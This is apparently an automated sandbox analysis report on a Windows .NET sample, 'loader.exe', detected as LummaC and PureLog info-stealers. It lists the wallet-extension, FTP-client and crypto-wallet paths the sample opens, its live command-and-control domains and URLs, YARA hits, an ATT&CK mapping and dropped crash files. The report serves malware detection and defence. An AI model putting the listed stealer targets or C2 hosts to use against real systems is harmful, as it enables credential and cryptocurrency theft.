Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\loader.exe	Directory queried: C:\Users\user\Documents\UOOJJOZIRH			Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	Directory queried: C:\Users\user\Documents\UOOJJOZIRH			Jump to behavior

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: Process Memory Space: loader.exe PID: 7388, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: loader.exe, type: SAMPLE
Source: Yara match	File source: 0.0.loader.exe.550000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loader.exe.3a19550.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loader.exe.3a19550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1818004819.0000000003A19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.1694866108.0000000000552000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	211 Process Injection	111 Deobfuscate/Decode Files or Information	LSASS Memory	22 System Information Discovery	Remote Desktop Protocol	31 Data from Local System	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	Logon Script (Windows)	3 Obfuscated Files or Information	Security Account Manager	1 Query Registry	SMB/Windows Admin Shares	1 Screen Capture	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Software Packing	NTDS	231 Security Software Discovery	Distributed Component Object Model	3 Clipboard Data	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	23 Virtualization/Sandbox Evasion	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	23 Virtualization/Sandbox Evasion	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	211 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
loader.exe	32%	ReversingLabs	Win32.Trojan.Generic
loader.exe	100%	Avira	TR/Dropper.MSIL.Gen
loader.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://undesirabkel.click/api	100%	Avira URL Cloud	malware
https://undesirabkel.click/	100%	Avira URL Cloud	malware
https://undesirabkel.click/apiunch_countnt5	100%	Avira URL Cloud	malware
https://undesirabkel.click/apilet	100%	Avira URL Cloud	malware
https://undesirabkel.click/apil	100%	Avira URL Cloud	malware
https://undesirabkel.click/ab	100%	Avira URL Cloud	malware
https://undesirabkel.click/apiU	100%	Avira URL Cloud	malware
undesirabkel.click	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
undesirabkel.click	188.114.97.3	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
cloudewahsj.shop	false		high
noisycuttej.shop	false		high
undesirabkel.click	true	Avira URL Cloud: malware	unknown
nearycrepso.shop	false		high
rabidcowse.shop	false		high
wholersorie.shop	false		high
https://undesirabkel.click/api	true	Avira URL Cloud: malware	unknown
framekgirus.shop	false		high
tirepublicerj.shop	false		high
abruptyopsn.shop	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://undesirabkel.click/apiunch_countnt5	loader.exe, 00000002.00000002.2934846468.0000000003C8E000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://undesirabkel.click/apiU	loader.exe, 00000002.00000002.2934517276.00000000016D3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://undesirabkel.click/ab	loader.exe, 00000002.00000002.2934759254.0000000003C6F000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://upx.sf.net	Amcache.hve.5.dr	false		high
https://undesirabkel.click/apil	loader.exe, 00000002.00000002.2934454000.00000000016BC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://undesirabkel.click/	loader.exe, 00000002.00000002.2934789350.0000000003C7F000.00000004.00000800.00020000.00000000.sdmp, loader.exe, 00000002.00000002.2934517276.00000000016D3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://undesirabkel.click/apilet	loader.exe, 00000002.00000002.2934846468.0000000003C8E000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
188.114.97.3	undesirabkel.click	European Union		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1584534
Start date and time:	2025-01-05 19:27:10 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 41s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	loader.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@5/5@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 98% Number of executed functions: 32 Number of non-executed functions: 54
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.42.65.92, 40.126.32.72, 52.149.20.212, 13.107.246.45
Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: loader.exe

Simulations

Behavior and APIs

Time	Type	Description
13:28:04	API Interceptor	8x Sleep call for process: loader.exe modified
13:28:15	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.97.3	Gg6wivFINd.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	unasnetds.ru/eternalPython_RequestUpdateprocessAuthSqlTrafficTemporary.php
	Payment Receipt.exe	Get hash	malicious	FormBook	Browse	www.cifasnc.info/8rr3/
	dGhlYXB0Z3JvdXA=-free.exe	Get hash	malicious	Unknown	Browse	/api/get/free
	dGhlYXB0Z3JvdXA=-free.exe	Get hash	malicious	Unknown	Browse	/api/get/free
	RFQ 3100185 MAHAD.exe	Get hash	malicious	FormBook	Browse	www.rgenerousrs.store/o362/
	A2028041200SD.exe	Get hash	malicious	FormBook	Browse	www.beylikduzu616161.xyz/2nga/
	Delivery_Notification_00000260791.doc.js	Get hash	malicious	Unknown	Browse	radostdetym.ru/?ad=1JXSXybzEjjRJQDbVngTy7d8kEFAxmgmDN&id=rWoA9pTQhV1o4c5fjbOa-d26BGh3QU3-Bk0PqI4WnzM-5vl4IqKPymhrqkRpunF_PTHktMR-2qUlNAtnXA&rnd=45
	ce.vbs	Get hash	malicious	Unknown	Browse	paste.ee/d/lxvbq
	Label_00000852555.doc.js	Get hash	malicious	Unknown	Browse	tamilandth.com/counter/?ad=1GNktTwWR98eDEMovFNDqyUPsyEdCxKRzC&id=LWkA9pJQhl9uXU1kaDN-eSC-55GNxzVDsLXZhtXL8Pr1j1FTCf4XAYGxA0VCjCQra2XwotFrDHGSYxM&rnd=25
	PO 20495088.exe	Get hash	malicious	FormBook	Browse	www.ssrnoremt-rise.sbs/3jsc/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
undesirabkel.click	9cOUjp7ybm.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	PASS-1234.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	Launcher_x64.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	6QLvb9i.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	Loader.exe	Get hash	malicious	LummaC	Browse	104.21.30.13
	WonderHack.exe	Get hash	malicious	LummaC	Browse	104.21.30.13

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	LinxOptimizer.exe	Get hash	malicious	Unknown	Browse	172.67.75.163
	Script.exe	Get hash	malicious	LummaC, PureLog Stealer	Browse	104.21.80.1
	Setup.exe	Get hash	malicious	LummaC	Browse	104.21.64.1
	Set-up.exe	Get hash	malicious	LummaC	Browse	172.67.208.58
	Set-up.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.96.3
	'Set-up.exe	Get hash	malicious	LummaC	Browse	172.67.178.174
	setup.exe	Get hash	malicious	LummaC	Browse	172.67.163.221
	'Set-up.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	setup.msi	Get hash	malicious	Unknown	Browse	104.21.32.1
	Set-up.exe	Get hash	malicious	LummaC	Browse	104.21.21.63

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	Script.exe	Get hash	malicious	LummaC, PureLog Stealer	Browse	188.114.97.3
	Setup.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	Set-up.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	Set-up.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.3
	'Set-up.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	setup.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	'Set-up.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	Set-up.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	SET_UP.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	Setup.exe	Get hash	malicious	LummaC	Browse	188.114.97.3

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loader.exe_bf5bb1cb7ed6bbe96185736026b7345197bc6_d3a0ac04_c9aa6422-b519-42fe-80ae-02101ce9fdd4\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8829047368971201
Encrypted:	false
SSDEEP:	96:6q2uFc3cygcKLqRBs0hLjTOAqyS3QXIDcQlc6VcEdcw3F+BHUHZ0ownOgHkEwH3Q:/m3cxqRBoA0LR3UaGGzuiFcTZ24IO8C
MD5:	C8FE172A0F7715E051A5CA48FA322A30
SHA1:	6A021ADFC83364FD79C7B819E8B1F3159C076B09
SHA-256:	B92712FD66D0E1F643F96E30B0B88B73407BB75BE0BF8592E32B8A1EE4964446
SHA-512:	801FF6E9AC84A4BE583680ADF075E9571E0318C2C35D19B4C7A3502FAE1DCD651CEDD60586C2839C0B5AC703DD30D268D07AC5EBE9155B41F89DEEE043D0553B
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.5.7.5.2.8.4.1.5.8.9.6.7.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.5.7.5.2.8.4.6.5.8.9.6.7.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.9.a.a.6.4.2.2.-.b.5.1.9.-.4.2.f.e.-.8.0.a.e.-.0.2.1.0.1.c.e.9.f.d.d.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.4.c.5.d.4.2.a.-.6.5.2.1.-.4.6.8.e.-.8.7.d.7.-.4.7.8.3.8.e.d.c.c.2.7.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.e.r...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.9.8.-.0.0.0.1.-.0.0.1.4.-.3.7.9.6.-.9.4.8.e.9.f.5.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.b.2.2.0.c.a.c.8.c.b.c.f.c.a.5.d.8.8.6.9.f.1.4.9.f.7.b.7.9.e.b.0.0.0.0.f.f.f.f.!.0.0.0.0.5.e.0.0.f.9.d.f.d.f.3.e.b.e.e.b.9.a.7.f.a.9.1.7.7.0.8.1.7.0.4.f.2.0.0.7.9.6.c.d.!.l.o.a.d.e.r...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.6.4././.0.9./.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD5B9.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Sun Jan 5 18:28:04 2025, 0x1205a4 type
Category:	dropped
Size (bytes):	162689
Entropy (8bit):	3.6470697976724864
Encrypted:	false
SSDEEP:	1536:hKPkNuBojR1pN4uE2aOALhhDLTgckAjyFtTS+CDcNWb5I:csrp4uEqohhDLTgc4udcN++
MD5:	5737D69DFBCEE9C895BEB03A919BC972
SHA1:	69B4A893820D3D34D04A4DE6F7772A4505D10558
SHA-256:	1A76C441803C25E4B4559FA9F78A38CA1BE98EC10FBFED5C47C290522AEB83E2
SHA-512:	04184FFDEA55F1EB42953195704F087CC094069FCA4A31BB017485A72E111143898AD2B9A29E59E15E2A2D293ED0349B00214F27C4CDD29711DEF46331C5D8AA
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .......4.zg............$...............8.......$................2..........`.......8...........T............$...V......................................................................................................eJ..............GenuineIntel............T...........3.zg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD6A5.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8374
Entropy (8bit):	3.684882250212788
Encrypted:	false
SSDEEP:	192:R6l7wVeJ2jS6lzQZp6Y93SU9pGgmfFVJupr089b8XsfnoUm:R6lXJYS6lzC6YNSU9pGgmfFVJ68cfK
MD5:	193E888914733E570ED10C7B6C0C3745
SHA1:	745E1BE23A3424E0EBB97A8719F1985B11C34DF9
SHA-256:	BF255965D84DD2F2FB6C1D597F73F57FAAE0F7DEA8650073E56D507F6A59B2D8
SHA-512:	9ACC45B393DA9E5ED1D5EBBEF41C3F4685C062B8BF6488D204DADC895CFF9469B1F25AD95C67E31C5D04831728CDD31DFBCB139F6C732798F6E297BE7BAA2B80
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.3.2.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD6D4.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4672
Entropy (8bit):	4.4310659609846335
Encrypted:	false
SSDEEP:	48:cvIwWl8zskJg77aI9ACSVWpW8VY6Ym8M4JgdxPcf6FJ+q8vAdxPcfF/nA1d:uIjfiI7qCSk7VSJxf2KRfF/nA1d
MD5:	DDC1E3CBECB580E37F8782BD462C0F32
SHA1:	1CEBB0B81318306CCBBFF95CED8FE47BE575574B
SHA-256:	329DC81143B8CB11288CFEC1CEB642E904F951EE7E89571E95D7383BB2B91C10
SHA-512:	568996248E68325A2BE3071B11AEEC0DBA252961F6ADA5E5F3E757237B5828177C4040B2401F27F41CC501DC98D87F1CB2C8689FFCA04F68AA3E43E398CA1E99
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="662970" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.465485320834446
Encrypted:	false
SSDEEP:	6144:8IXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNudwBCswSbB:BXD94+WlLZMM6YFHA+B
MD5:	B680F4F0AEC74C85D327016C3D3890F5
SHA1:	70F1F5177A484234479F5FE9A2E0067AE64DDBA2
SHA-256:	EF4AC039AC51F147090221153C6AE686616EF2260827F105243AB062B677CE23
SHA-512:	64DDF0DF79669E09DD01EB4476570A265FA953429596659DCF52986AC150CA381A1AAEBB82EDFE32F458CE5786896FADC09D825AD9397DCAC31B0C1A93B334CD
Malicious:	false
Reputation:	low
Preview:	regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmR...._..............................................................................................................................................................................................................................................................................................................................................kH.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	0.5726337847479376
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Win16/32 Executable Delphi generic (2074/23) 0.01% Generic Win/DOS Executable (2004/3) 0.01%
File name:	loader.exe
File size:	8'750'080 bytes
MD5:	756cc98f850799fc6783bd07e91cab52
SHA1:	5e00f9dfdf3ebeeb9a7fa9177081704f200796cd
SHA256:	64a3d0f8623f9f27d8275349698641464a6d16295ece889c47611c9b84d90927
